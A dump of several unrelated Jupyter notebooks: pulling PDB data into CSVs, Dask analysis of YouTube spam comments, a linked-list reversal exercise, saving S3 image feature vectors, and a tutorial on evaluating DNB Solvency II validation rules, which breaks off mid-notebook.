"#writing the main pull\noutput_reader = csv.reader(r.text.splitlines())\nwith open('pdb_data_no_dups.csv', 'wb') as csvfile:\n csv_writer = csv.writer(csvfile)\n for row in output_reader:\n csv_writer.writerow(row)",
"_____no_output_____"
],
[
"len(r.text.splitlines())",
"_____no_output_____"
],
[
"!pwd",
"/Users/DZD/Data Visualization/Final\r\n"
],
[
"#sequence pull\npayload_seq = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'CustomReportColumns':sequences_string_names}\nr_seq = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload_seq)",
"_____no_output_____"
],
[
"#write sequence pull\noutput_reader_seq = csv.reader(r_seq.text.splitlines())\nwith open('pdb_data_seq.csv', 'wb') as csvfile:\n csv_writer_seq = csv.writer(csvfile)\n for row in output_reader_seq:\n csv_writer_seq.writerow(row)",
"_____no_output_____"
]
],
[
[
"reports = \"StructureSummary,Sequence,Ligands,BindingAffinity,BiologicalDetails,ClusterEntity,\"+\\\n \"Domains,Crystallization,UnitCellDimensions,DataCollectionDetails,RefinementDetails\"+\\\n \"refinementParameters,NmrSoftware,NmrSpectrometer,NMRExperimentalSampleConditions,NmrRepresentative\"+\\\n \"NMRRefinement,NmrEnsemble,EMStructure,Citation,OtherCitations,SGProject\"",
"_____no_output_____"
],
[
"payload_all = {'pdbids': '*','service': 'wsfile', 'format': 'csv', 'primaryOnly': '1', 'reportName':reports}\nr_all = requests.get('http://www.rcsb.org/pdb/rest/customReport', params=payload_all)\noutput_reader_all = csv.reader(r_all.text.splitlines())\nwith open('pdb_data_all.csv', 'wb') as csvfile:\n csv_writer = csv.writer(csvfile)\n for row in output_reader:\n csv_writer.writerow(row)",
"_____no_output_____"
],
[
"r_all.url",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
cb5218874a291a46d35d3aae8e536dda3940810e | 92,940 | ipynb | Jupyter Notebook | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | Parts_1_and_2 (2).ipynb | wjarvis2/DS-Unit-3-Sprint-3-Big-Data | 4706362317be8eae6ac888003390dfac40060bec | [
"MIT"
] | null | null | null | 41.959368 | 1,124 | 0.445094 | [
[
[
"import dask.dataframe as dask",
"_____no_output_____"
],
[
"dask_df = dask.read_csv(\"*.csv\")",
"_____no_output_____"
],
[
"dask_df",
"_____no_output_____"
],
[
"dask_df.head()",
"_____no_output_____"
],
[
"# Elnino Melendez sounds like she has some real wholesome, family-friendly content on her channel",
"_____no_output_____"
],
[
"dask_df.count().compute()",
"_____no_output_____"
],
[
"dask_df.columns",
"_____no_output_____"
],
[
"len(dask_df)",
"_____no_output_____"
],
[
"# Looks like 1956 instances (rows) and 5 features (columns)",
"_____no_output_____"
],
[
"dask_df['CLASS'].value_counts().compute()",
"_____no_output_____"
],
[
"# Looks like 1005 instances of spam and 951 of non-spam",
"_____no_output_____"
],
[
"dask_df['CONTENT'].str.lower().compute()[1:5]",
"_____no_output_____"
],
[
"spam = dask_df[(dask_df['CLASS'] == 1)].compute()",
"_____no_output_____"
],
[
"spam",
"_____no_output_____"
],
[
"len(spam)",
"_____no_output_____"
],
[
"# The 1005 spam comments",
"_____no_output_____"
],
[
"spam['CONTENT'].str.lower().str.contains('check').value_counts()",
"_____no_output_____"
],
[
"high_quality_non_spam_content = dask_df[(dask_df['CLASS'] == 0)].compute()",
"_____no_output_____"
],
[
"high_quality_non_spam_content",
"_____no_output_____"
],
[
"high_quality_non_spam_content['CONTENT'].str.lower().str.contains('check').value_counts()",
"_____no_output_____"
],
[
"# Yep. Looks like saying \"Check out ....!\" is a dead giveaway",
"_____no_output_____"
],
[
"# Instead, maybe they should utilize a colloquialism like \"Take a gander at ...!\"",
"_____no_output_____"
],
[
"high_quality_non_spam_content['CONTENT'].str.lower().str.contains('gander').value_counts()",
"_____no_output_____"
],
[
"spam['CONTENT'].str.lower().str.contains('gander').value_counts()",
"_____no_output_____"
],
[
"# Yep, looks like they just need to switch up their vernacular a bit ",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
],
[
"dask_df['dt'] = dask_df['DATE'].astype('M8[M]')",
"_____no_output_____"
],
[
"dask_df.head()",
"_____no_output_____"
],
[
"sorted_df = dask_df.set_index(['dt']).compute()",
"_____no_output_____"
],
[
"# Well, I was going to sort the values by month and then see how the spam counts changed over time\n# but, it looks like sorting in dask takes a bit more time than I want to give it right now",
"_____no_output_____"
]
],
[
[
"# Big Data Options",
"_____no_output_____"
],
[
"Considerations in Spark vs Dask",
"_____no_output_____"
],
[
"'",
"_____no_output_____"
],
[
"Common considerations in determining whether Spark or Dask is more appropriate in a given situation often come down to personal preference and experience, though there are a few functional restrictions in choosing one over the other. Among the initial considerations in choosing one over the other will be one's experience in python and potential prior experience in languages such as SQL or Scala. Dask is written and runs exclusively in python. Though this may sound restrictive, I appreciate the familiarity as Python is the language in which I have the greatest degree of experience. Because Dask uses the Pandas APIs, working with a Dask dataframe is only minimally different from a typical pandas dataframe. Spark, however, is written in Scala but provides support for both python and R while providing a moderately intuitive level of familiarity to those with experience in SQL. Rather than using APIs from a different language, as is the case with Dask and Pandas, Spark has its own set of APIs. Again, given my familiarity with python and Pandas, Dask continues to be my high-level, big data tool of choice. ",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb521aef2d8503275cca6f2565c69791220dfcc1 | 9,911 | ipynb | Jupyter Notebook | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | 1 | 2018-02-25T15:24:17.000Z | 2018-02-25T15:24:17.000Z | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | null | null | null | post_tag_based_generation.ipynb | diegojromerolopez/lovecraft-nlp-study | 73d743ab9ee369e94ef57a09bbcfed45508c1061 | [
"MIT"
] | null | null | null | 34.775439 | 292 | 0.52467 | [
[
[
"import nltk\nimport re\nimport operator\nfrom collections import defaultdict\nimport numpy as np\n\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"The idea is generate more common sentences according to their word tagging. So the sentences will have the real structure written by lovecraft and composed by a list of most common words in that kind of sentence.\n\nThe result should be a somewhat real phrase.",
"_____no_output_____"
]
],
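[
[
"# Quick illustration (added for clarity; not part of the original notebook): a POS-tagged\n# sentence pairs every word with a part-of-speech tag, and the sequence of tags is what is\n# treated as the 'structure' of a sentence in the code below.\nnltk.pos_tag(['the', 'old', 'house', 'stood', 'on', 'the', 'hill'])",
"_____no_output_____"
]
],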
[
[
"lovecraft = nltk.corpus.PlaintextCorpusReader(\"lovecraft\", \".*\")",
"_____no_output_____"
],
[
"class TaggedWord(object):\n \n def __init__(self, words, count):\n self.word_hash = {}\n self.words = words\n self.count = count\n index = 0\n for word in words:\n self.word_hash[word] = index\n index += 1\n\n def update(self, word):\n word_index = self.word_hash.get(word)\n if word_index is not None:\n self.count[word_index] += 1\n else:\n self.words.append(word)\n self.count.append(1)\n word_index = len(self.words) - 1\n self.word_hash[word] = word_index\n \n def get_random(self, seed):\n np.random.seed(seed=seed)\n total_count = sum(self.count)\n probabilities = [word_count/total_count for word_count in self.count]\n random_word_chose = np.random.multinomial(1, probabilities)\n random_word_index = list(random_word_chose).index(1)\n return self.words[random_word_index]\n\n\nclass Sentence(object):\n \n def __init__(self, words, tags):\n self.tags = tags\n self.words = []\n for word in words:\n self.words.append(TaggedWord(words=[word.lower()], count=[1]))\n \n def update(self, words):\n word_index = 0\n for word in words:\n self.words[word_index].update(word.lower())\n word_index += 1\n \n def generate(self, seed):\n return [word.get_random(seed) for word in self.words]",
"_____no_output_____"
],
[
"lovecraft_sentences = lovecraft.sents()\nsentences = {}\nsentence_count = defaultdict(int)\nfor tokenized_sentence in lovecraft_sentences:\n sentence_with_tagged_words = nltk.pos_tag(tokenized_sentence)\n \n sentence_words = list(zip(*sentence_with_tagged_words))[0]\n sentence_tags = list(zip(*sentence_with_tagged_words))[1]\n \n sentence_checksum = \"-\".join(sentence_tags)\n \n if sentence_checksum in sentences:\n sentences[sentence_checksum].update(sentence_words)\n else:\n sentences[sentence_checksum] = Sentence(words=sentence_words, tags=sentence_tags)\n \n sentence_count[sentence_checksum] += 1",
"_____no_output_____"
],
[
"total_count = sum(sentence_count.values())\nsentence_tags = [_sentence_tags for _sentence_tags in sentences.keys()]\nsentence_probabilities = [sentence_count[sentence_tag]/total_count for sentence_tag in sentence_tags]\n\n\nfor i in range(0, 3):\n random_sentence_chose = np.random.multinomial(1, sentence_probabilities)\n random_sentence_index = list(random_sentence_chose).index(1)\n print(sentences[sentence_tags[random_sentence_index]].generate(0))",
"['the', 'bus', ',', 'rather', 'early', ',', 'rattled', 'in', 'with', 'three', 'passengers', 'somewhat', 'before', 'eight', ',', 'and', 'an', 'evil', '-', 'looking', 'fellow', 'on', 'the', 'sidewalk', 'muttered', 'a', 'few', 'indistinguishable', 'words', 'to', 'the', 'driver', '.']\n['there', 'seemed', 'virtually', 'nothing', 'to', 'do', 'to', 'calm', 'them', ',', 'and', 'when', 'nahum', 'opened', 'the', 'stable', 'door', 'they', 'all', 'bolted', 'out', 'like', 'frightened', 'woodland', 'deer', '.']\n['there', 'seemed', 'virtually', 'nothing', 'to', 'do', 'to', 'calm', 'them', ',', 'and', 'when', 'nahum', 'opened', 'the', 'stable', 'door', 'they', 'all', 'bolted', 'out', 'like', 'frightened', 'woodland', 'deer', '.']\n"
]
],
[
[
"The problem with that approach is that if the author uses a rich grammar (as it is the case of Lovecraft), not many phrases are gramatically repeated,\nso we get many unique tagged sentences as it happens here.",
"_____no_output_____"
]
],
[
[
"print(\"{} sentences are available and there are {} unique sentences (almost all)\".format(len(sentences), len([s for s, c in sentence_count.items() if c == 1])))\n\nprint(\"Sentences with more than one occurrence:\")\nfor cs, count in sentence_count.items():\n if count > 1:\n print(\"{}: {} times\".format(cs, count))",
"18893 sentences are available and there are 18811 unique sentences (almost all)\nSentences with more than one occurrence:\nDT-NNP: 8 times\nPRP-.: 8 times\nPRP: 8 times\nNN: 56 times\nDT-NNP-NNP-NNP-NNP: 8 times\nNNP-VBD-VBN-.: 3 times\nRB-DT-NN-VBD-.: 2 times\nPRP-VBD-DT-NN-.: 3 times\nDT-NN-VBD-RB-JJ-.: 2 times\nIN-NNP-NNP-NNP-NNP: 2 times\nDT-NN-.: 3 times\nDT-NNP-NNP-NNP-NNP-NNP: 3 times\n:-NN: 2 times\nDT-NNP-CC-DT-NNP-NNP-.: 3 times\nDT-NNP-CC-DT-NN: 4 times\nCD: 25 times\nNNP-.: 36 times\nPRP-VBD-:: 3 times\nNNP-VBD-RB-JJ-.: 2 times\nPRP-VBP-TO-PRP-VB-,-VB-RB-VB-RP-NNP-IN-PRP-MD-RB-VB-NNS-:-IN-DT-NNP-PRP-VBP-,-VBP-WDT-MD-IN-NNP-VB-RP-NNP-IN-PRP-,-VB-PRP$-NNP-NNPS-MD-RB-VB-IN-NN-.: 2 times\nNNP-IN-DT-NNP-,-IN-DT-NNP-MD-RB-VB-TO-NNP-,-CC-JJ-NN-JJR-IN-PRP-.: 2 times\nNNP-.-NNP-.: 3 times\nNNP: 4 times\nNNP-NNP-.: 6 times\nNN-.: 28 times\nNN-NNP-.: 5 times\nPOS-NNP-.: 3 times\nCD-.: 2 times\nNNP-NN-.: 3 times\nEX-VBD-DT-NN-.: 2 times\nPRP-VBD-IN-VBZ-:: 2 times\nJJ-NNP-NN: 2 times\nUH-.: 2 times\nDT-VBZ-DT-.: 2 times\nDT-NNP-NNP: 9 times\nNNP-NN: 3 times\nDT-VBD-DT-.: 4 times\nJJ-NNP-.: 8 times\nCC-DT-VBD-DT-.: 2 times\nRB-RB-.: 2 times\nNNP-NNP: 4 times\nDT-NNP-NNP-NNP: 6 times\nDT-NNP-IN-NNP-NNP: 2 times\nJJ-NNP-POS-JJ-NN-POS-NN-NNP-NNP-POS-NN-NN-''-JJ-NN-NN: 2 times\nDT-VBZ-RB-JJ-WDT-MD-VB-NN-,-CC-IN-JJ-NNS-RB-NN-MD-VB-.: 2 times\nDT-NNP-IN-DT-NNP: 2 times\nPRP-MD-VB-PRP-.: 3 times\nVB-PRP-.: 2 times\nNNP-:-NN-.: 10 times\nDT-NNP-IN-DT-NNP-NNP-NN: 2 times\nPRP-VBP-PRP-.: 2 times\nNN-CD: 5 times\nNN-NNP: 3 times\nJJ-IN-NN-.: 2 times\nRB-PRP-VBD-.: 3 times\nRB-VBD-DT-JJ-NN-.: 2 times\nNNP-,-NN-.: 5 times\nJJ-NN-.: 5 times\nDT-NNP-IN-DT-NNP-NNP-.: 2 times\nDT-NNP-IN-DT-NNS: 2 times\nNNP-POS-NNP-NNP: 2 times\nPRP-VBD-.: 5 times\nNNP-POS-NN-NN-''-JJ-NN-NN-''-NN-.: 2 times\nDT-NN-''-NN-.: 2 times\nJJ-CD-:-CD-NNP-.-NNP-.: 2 times\nNN-NNP-:-NN-.: 2 times\nNNP-:-NN-NN: 6 times\nDT-NN: 3 times\nNNP-VBD-PRP-.: 2 times\nNNS: 2 times\nIN-PRP-.: 2 times\nCD-,-DT-.: 5 times\nVBN-NNP-CD-IN-NNP-NNP-NNP-.: 4 times\nCD-,-NN-.-CD-:-CD-.: 3 times\nNN-NNP-:-DT-NNP-IN-DT-NNP: 2 times\nPOS-NNP-NN-CC-NN-IN-NN-,-NN-WP-VBP-IN-DT-NN-IN-NNS-CC-JJ-NN-,-WP-JJS-IN-DT-NN-IN-NNS-IN-DT-NNS-,-WP-JJS-IN-NN-CC-JJS-NN-TO-NNS-,-NNP-,-NNP-,-NN-RB-IN-PRP$-NNS-VBP: 2 times\nPRP$-JJ-NNP-:: 2 times\n(-DT-NNP-NNP-IN-NNP-NNP-): 2 times\n(-NNP-NNP-): 3 times\nNNP-:-NNP: 2 times\n(-NNP-NNP-NNP-): 2 times\n(-NNP-): 2 times\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb521b82dccdf33fb573e65bd38b240b017916cb | 3,519 | ipynb | Jupyter Notebook | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:39:53.000Z | 2019-12-05T06:39:53.000Z | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | null | null | null | Top 100 interview Questions/Linked list - 26. Reverse Linked List.ipynb | Daisy-Engineer/leetcode | 7f2037867ace40e84647ac2b2530a89a4b36fae7 | [
"Apache-2.0"
] | null | null | null | 35.19 | 1,080 | 0.561523 | [
[
[
"Reverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL",
"_____no_output_____"
]
],
[
[
"# Definition for singly-linked list.\n# useful Animation link: https://github.com/MisterBooo/LeetCodeAnimation/blob/master/notes/LeetCode%E7%AC%AC206%E5%8F%B7%E9%97%AE%E9%A2%98%EF%BC%9A%E5%8F%8D%E8%BD%AC%E9%93%BE%E8%A1%A8.md\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head:\n return None\n prev = None\n cur = head\n while cur:\n cur.next, prev, cur = prev, cur, cur.next\n return prev\n\nl1 = [1,2,3]\np = Solution()\nprint(p.reverseList(ListNode().__init__(_,l1)))",
"_____no_output_____"
],
[
"head = [1,2,3,4]\n\ndef a(head):\n if not head:\n return 1\n\na(head)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
]
] |
cb5222b500e3f8927390ff583fb8d913ae38ebda | 4,484 | ipynb | Jupyter Notebook | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 5 | 2019-12-07T09:29:38.000Z | 2021-09-02T09:46:56.000Z | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 37 | 2019-10-25T11:17:35.000Z | 2021-10-20T16:39:50.000Z | notebooks/image_pathways/notebooks/7. Save_all_FV_pathways.ipynb | wellcomecollection/data-science | b91b31c344e2d8ca43f1e3e92a7b361ba110f25b | [
"MIT"
] | 1 | 2021-01-14T18:14:52.000Z | 2021-01-14T18:14:52.000Z | 22.532663 | 133 | 0.556869 | [
[
[
"In this notebook we:\n- Load all the feature vectors from S3\n- Save them in .npy form",
"_____no_output_____"
]
],
[
[
"%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
],
[
"from tqdm import tqdm\nimport os\nfrom io import BytesIO\nimport ast\nimport numpy as np\nimport pickle\nfrom itertools import compress\nfrom collections import Counter\nimport operator\nimport datetime\n\nfrom PIL import Image\nimport torch\nimport boto3\nfrom scipy.spatial.distance import cdist\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom itertools import combinations\nimport umap.umap_ as umap",
"_____no_output_____"
],
[
"cd ..",
"_____no_output_____"
],
[
"from src.network_functions import import_feature_vectors",
"_____no_output_____"
],
[
"# Get all the png image names from the data folder\nimages_dir = \"data/\"\nimage_type = \".png\"\n\nimage_names = os.listdir(images_dir)\nimage_names = [os.path.splitext(file)[0] for file in image_names if image_type in file]\nlen(image_names)",
"_____no_output_____"
]
],
[
[
"## Import all feature vectors",
"_____no_output_____"
]
],
[
[
"bucket_name = \"miro-images-feature-vectors\"\nfolder_name = \"feature_vectors\"\nn = 3 # This is what X degrees of separation uses 15, but perhaps this is too much, should it be a fraction of the n_sample?\ndist_threshold = 0.35\n\nbucket_name = bucket_name\ns3 = boto3.client(\"s3\")",
"_____no_output_____"
],
[
"feature_vectors, _ = import_feature_vectors(s3, bucket_name, folder_name, image_names)",
"_____no_output_____"
],
[
"len(feature_vectors)",
"_____no_output_____"
],
[
"# Remove the name of this image from the list if no feature vector was found for it\nimage_name_fv = [x for x in image_names if x in list(feature_vectors.keys())]",
"_____no_output_____"
],
[
"len(image_name_fv)",
"_____no_output_____"
],
[
"# Save\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y%m%d\")\nnp.save(\n \"data/{}_feature_vectors_ids\".format(date), np.array(list(feature_vectors.keys()))\n)\nnp.save(\n \"data/{}_feature_vectors\".format(date), np.array(list(feature_vectors.values()))\n)",
"_____no_output_____"
],
[
"print(\"data/{}_feature_vectors_ids\".format(date))\nprint(\"data/{}_feature_vectors\".format(date))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb523eaf4658a95fe6e2747214189c30a7e18af3 | 73,663 | ipynb | Jupyter Notebook | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/data-quality-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 5 | 2020-09-22T07:32:49.000Z | 2021-07-09T19:52:58.000Z | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/solvency2-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 27 | 2020-09-01T14:28:36.000Z | 2021-07-13T07:27:33.000Z | notebooks/Tutorial Evaluate DNBs Additional Validation Rules.ipynb | DeNederlandscheBank/solvency2-rules | 311487b8a9c97018c0a4c15ba1f95036c00b9e1a | [
"MIT"
] | 3 | 2021-01-19T14:59:41.000Z | 2022-03-23T09:51:25.000Z | 39.307898 | 911 | 0.369018 | [
[
[
"# Tutorial - Evaluate DNBs additional Rules",
"_____no_output_____"
],
[
"This notebook contains a tutorial for the evaluation of DNBs additional Rules for the following Solvency II reports:\n- Annual Reporting Solo (ARS); and\n- Quarterly Reporting Solo (QRS)\n\nBesides the necessary preparation, the tutorial consists of 6 steps:\n1. Read possible datapoints\n2. Read data\n3. Clean data\n4. Read additional rules\n5. Evaluate rules\n6. Save results",
"_____no_output_____"
],
[
"## 0. Preparation",
"_____no_output_____"
],
[
"### Import packages",
"_____no_output_____"
]
],
[
[
"import pandas as pd # dataframes\nimport numpy as np # mathematical functions, arrays and matrices\nfrom os.path import join, isfile # some os dependent functionality\nimport data_patterns # evaluation of patterns\nimport regex as re # regular expressions\nfrom pprint import pprint # pretty print\nimport logging",
"_____no_output_____"
]
],
[
[
"### Variables",
"_____no_output_____"
]
],
[
[
"# ENTRYPOINT: 'ARS' for 'Annual Reporting Solo' or 'QRS' for 'Quarterly Reporting Solo'\n# INSTANCE: Name of the report you want to evaluate the additional rules for\n\nENTRYPOINT = 'ARS' \nINSTANCE = 'ars_240_instance' # Test instances: ars_240_instance or qrs_240_instance",
"_____no_output_____"
],
[
"# DATAPOINTS_PATH: path to the excel-file containing all possible datapoints (simplified taxonomy)\n# RULES_PATH: path to the excel-file with the additional rules\n# INSTANCES_DATA_PATH: path to the source data\n# RESULTS_PATH: path to the results\n\nDATAPOINTS_PATH = join('..', 'data', 'datapoints')\nRULES_PATH = join('..', 'solvency2-rules')\nINSTANCES_DATA_PATH = join('..', 'data', 'instances', INSTANCE)\nRESULTS_PATH = join('..', 'results') ",
"_____no_output_____"
],
[
"# We log to rules.log in the data/instances path\n\nlogging.basicConfig(filename = join(INSTANCES_DATA_PATH, 'rules.log'),level = logging.INFO, \n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')",
"_____no_output_____"
]
],
[
[
"## 1. Read possible datapoints",
"_____no_output_____"
],
[
"In the data/datapoints directory there is a file for both ARS and QRS in which all possible datapoints are listed (simplified taxonomy). \nWe will use this information to add all unreported datapoints to the imported data.",
"_____no_output_____"
]
],
[
[
"df_datapoints = pd.read_csv(join(DATAPOINTS_PATH, ENTRYPOINT.upper() + '.csv'), sep=\";\").fillna(\"\") # load file to dataframe\ndf_datapoints.head()",
"_____no_output_____"
]
],
[
[
"## 2. Read data",
"_____no_output_____"
],
[
"We distinguish 2 types of tables: \n- With a closed-axis, e.g. the balance sheet: an entity reports only 1 balance sheet per period\n- With an open-axis, e.g. the list of assets: an entity reports several 'rows of data' in the relevant table",
"_____no_output_____"
],
[
"### General information",
"_____no_output_____"
],
[
"First we gather some general information:\n- A list of all possible reported tables\n- A list of all reported tables\n- A list of all tables that have not been reported",
"_____no_output_____"
]
],
[
[
"tables_complete_set = df_datapoints.tabelcode.sort_values().unique().tolist()\ntables_reported = [table for table in tables_complete_set if isfile(join(INSTANCES_DATA_PATH, table + '.pickle'))]\ntables_not_reported = [table for table in tables_complete_set if table not in tables_reported]",
"_____no_output_____"
]
],
[
[
"### Closed-axis",
"_____no_output_____"
],
[
"Besides all separate tables, the 'Tutorial Convert XBRL-instance to CSV, HTML and pickles' also outputs a large dataframe with the data from all closed-axis tables combined. \nWe use this dataframe for evaluating the patterns on closed-axis tables.",
"_____no_output_____"
]
],
[
[
"df_closed_axis = pd.read_pickle(join(INSTANCES_DATA_PATH, INSTANCE + '.pickle'))\ntables_closed_axis = sorted(list(set(x[:13] for x in df_closed_axis.columns)))\ndf_closed_axis.head()",
"_____no_output_____"
]
],
[
[
"### Open-axis",
"_____no_output_____"
],
[
"For open-axis tables we create a dictionary with all data per table. \nLater we will evaluate the additional rules on each seperate table in this dictionary.",
"_____no_output_____"
]
],
[
[
"dict_open_axis = {}\ntables_open_axis = [table for table in tables_reported if table not in tables_closed_axis]\n\nfor table in tables_open_axis:\n df = pd.read_pickle(join(INSTANCES_DATA_PATH, table + '.pickle'))\n \n # Identify which columns within the open-axis table make a table row unique (index-columns):\n index_columns_open_axis = [col for col in list(df.index.names) if col not in ['entity','period']]\n \n # Duplicate index-columns to data columns:\n df.reset_index(level=index_columns_open_axis, inplace=True)\n for i in range(len(index_columns_open_axis)):\n df['index_col_' + str(i)] = df[index_columns_open_axis[i]].astype(str)\n df.set_index(['index_col_' + str(i)], append=True, inplace=True)\n \n dict_open_axis[table] = df \n\nprint(\"Open-axis tables:\")\nprint(list(dict_open_axis.keys()))",
"Open-axis tables:\n['S.01.03.01.01', 'S.01.03.01.02', 'S.03.02.01.01', 'S.03.03.01.01', 'S.06.02.01.01', 'S.06.02.01.02', 'S.06.03.01.01', 'S.07.01.01.01', 'S.08.01.01.01', 'S.08.01.01.02', 'S.08.02.01.01', 'S.08.02.01.02', 'S.09.01.01.01', 'S.10.01.01.01', 'S.11.01.01.01', 'S.11.01.01.02', 'S.14.01.01.01', 'S.14.01.01.02', 'S.14.01.01.03', 'S.14.01.01.04', 'S.15.01.01.01', 'S.15.02.01.01', 'S.21.02.01.01', 'S.23.04.01.01', 'S.23.04.01.02', 'S.23.04.01.03', 'S.23.04.01.04', 'S.23.04.01.05', 'S.23.04.01.06', 'S.23.04.01.07', 'S.24.01.01.01', 'S.24.01.01.02', 'S.24.01.01.05', 'S.24.01.01.06', 'S.24.01.01.07', 'S.24.01.01.08', 'S.24.01.01.09', 'S.25.02.01.01', 'S.25.03.01.01', 'S.30.02.01.03', 'S.30.02.01.04', 'S.30.03.01.01', 'S.30.04.01.01', 'S.30.04.01.02', 'S.30.04.01.03', 'S.31.01.01.01', 'S.31.01.01.02', 'S.31.02.01.01', 'S.31.02.01.02', 'S.36.01.01.01', 'S.36.02.01.01', 'S.36.03.01.01', 'S.36.04.01.01']\n"
]
],
[
[
"## 3. Clean data",
"_____no_output_____"
],
[
"We have to make 2 modifications on the data:\n1. Add unreported datapoints \nso rules (partly) pointing to unreported datapoints can still be evaluated\n2. Change string values to uppercase \nbecause the additional rules are defined using capital letters for textual comparisons ",
"_____no_output_____"
]
],
[
[
"all_datapoints = [x.replace(',,',',') for x in \n list(df_datapoints['tabelcode'] + ',' + df_datapoints['rij'] + ',' + df_datapoints['kolom'])]\nall_datapoints_closed = [x for x in all_datapoints if x[:13] in tables_closed_axis]\nall_datapoints_open = [x for x in all_datapoints if x[:13] in tables_open_axis]",
"_____no_output_____"
]
],
[
[
"### Closed-axis tables",
"_____no_output_____"
]
],
[
[
"# add not reported datapoints to the dataframe with data from closed axis tables:\nfor col in [column for column in all_datapoints_closed if column not in list(df_closed_axis.columns)]:\n df_closed_axis[col] = np.nan\ndf_closed_axis.fillna(0, inplace = True)\n\n# string values to uppercase\ndf_closed_axis = df_closed_axis.applymap(lambda s:s.upper() if type(s) == str else s)",
"_____no_output_____"
]
],
[
[
"### Open-axis tables",
"_____no_output_____"
]
],
[
[
"for table in [table for table in dict_open_axis.keys()]:\n all_datapoints_table = [x for x in all_datapoints_open if x[:13] == table]\n for col in [column for column in all_datapoints_table if column not in list(dict_open_axis[table].columns)]:\n dict_open_axis[table][col] = np.nan\n dict_open_axis[table].fillna(0, inplace = True)\n \n dict_open_axis[table] = dict_open_axis[table].applymap(lambda s:s.upper() if type(s) == str else s)",
"_____no_output_____"
]
],
[
[
"## 4. Read additional rules",
"_____no_output_____"
],
[
"DNBs additional validation rules are published as an Excel file on the DNB statistics website. \nWe included the Excel file in the project under data/downloaded files.\n\nThe rules are already converted to a syntax Python can interpret, using the notebook: 'Convert DNBs Additional Validation Rules to Patterns'. \nIn the next line of code we read these converted rules (patterns).",
"_____no_output_____"
]
],
[
[
"df_patterns = pd.read_excel(join(RULES_PATH, ENTRYPOINT.lower() + '_patterns_additional_rules.xlsx'), engine='openpyxl').fillna(\"\").set_index('index')",
"_____no_output_____"
]
],
[
[
"## 5. Evaluate rules",
"_____no_output_____"
],
[
"### Closed-axis tables",
"_____no_output_____"
],
[
"To be able to evaluate the rules for closed-axis tables, we need to filter out:\n- patterns for open-axis tables; and\n- patterns pointing to tables that are not reported.",
"_____no_output_____"
]
],
[
[
"df_patterns_closed_axis = df_patterns.copy()\ndf_patterns_closed_axis = df_patterns_closed_axis[df_patterns_closed_axis['pandas ex'].apply(\n lambda expr: not any(table in expr for table in tables_not_reported) \n and not any(table in expr for table in tables_open_axis))]\ndf_patterns_closed_axis.head()",
"_____no_output_____"
]
],
[
[
"We now have:\n- the data for closed-axis tables in a dataframe;\n- the patterns for closed-axis tables in a dataframe.\n\nTo evaluate the patterns we need to create a 'PatternMiner' (part of the data_patterns package), and run the analyze function.",
"_____no_output_____"
]
],
[
[
"miner = data_patterns.PatternMiner(df_patterns=df_patterns_closed_axis)\ndf_results_closed_axis = miner.analyze(df_closed_axis)\ndf_results_closed_axis.head()",
